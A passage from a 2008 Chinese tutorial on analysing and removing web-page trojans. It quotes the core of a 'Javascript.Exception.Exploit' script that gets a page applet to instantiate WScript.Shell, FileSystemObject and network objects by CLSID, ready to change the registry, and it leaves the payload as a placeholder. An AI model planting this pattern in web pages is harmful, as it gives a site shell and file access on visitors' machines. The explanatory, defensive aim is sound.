网页木马深度剖析以及手工清除2

文章作者 100test 发表时间 2008:04:02 14:01:35
来源 100Test.Com百考试题网

第二节 网页病毒、网页木马的运行机理分析

　　Ⅰ。Javascript.Exception.Exploit

　　精华语句：

　　Functiondestroy（）{

　　try

　　{

　　//ActiveXinitialization初始化ActiveX，为修改注册表做准备

　　a1=document.applets[0]；

　　//获取applet运行对象，以下语句指向注册表中有关IE的表项

　　a1.setCLSID（"{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"）；

　　a1.createInstance（）；

　　Shl=a1.GetObject（）；

　　a1.setCLSID（"{0D43FE01-F093-11CF-8940-00A0C9054228}"）；

　　a1.createInstance（）；

　　FSO=a1.GetObject（）；

　　a1.setCLSID（"{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}"）；

　　a1.createInstance（）；

　　Net=a1.GetObject（）；

　　try

　　{

　　开始做坏事

　　}

　　}

　　catch（e）

　　{}

　　}

　　catch（e）

　　{}

　　}

　　functiondo（）

　　{

　　//初始化函数，并每隔一秒执行修改程序

　　setTimeout（"destroy（）"，1000）；//设定运行时间1秒

　　}

　　Do（）//坏事执行函数指令